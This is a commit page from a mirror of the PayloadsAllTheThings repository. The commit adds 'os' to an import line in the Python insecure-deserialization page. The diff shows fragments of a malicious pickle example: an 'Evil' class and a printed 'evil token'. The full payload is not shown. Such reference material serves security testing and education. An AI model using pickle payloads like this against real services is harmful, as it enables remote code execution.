wanderer/ PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-18 12:26:14 +02:00
Code Issues Releases Activity

import os

This commit is contained in:
nerrorsec 2022-03-24 11:54:34 +05:45 committed by GitHub
parent d40e055629
commit df8493e4e6
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
Insecure Deserialization/Python.md
View File

@ -32,7 +32,7 @@ Python 2.7 documentation clearly states Pickle should never be used with untrust
> The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source. > The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.
```python ```python
import cPickle import cPickle, os
from base64 import b64encode, b64decode from base64 import b64encode, b64decode
class Evil(object): class Evil(object):
@ -47,4 +47,4 @@ print("Your Evil Token : {}").format(evil_token)
## References ## References
* [Exploiting misuse of Python's "pickle" - Mar 20, 2011](https://blog.nelhage.com/2011/03/exploiting-pickle/) * [Exploiting misuse of Python's "pickle" - Mar 20, 2011](https://blog.nelhage.com/2011/03/exploiting-pickle/)
* [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/) * [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/)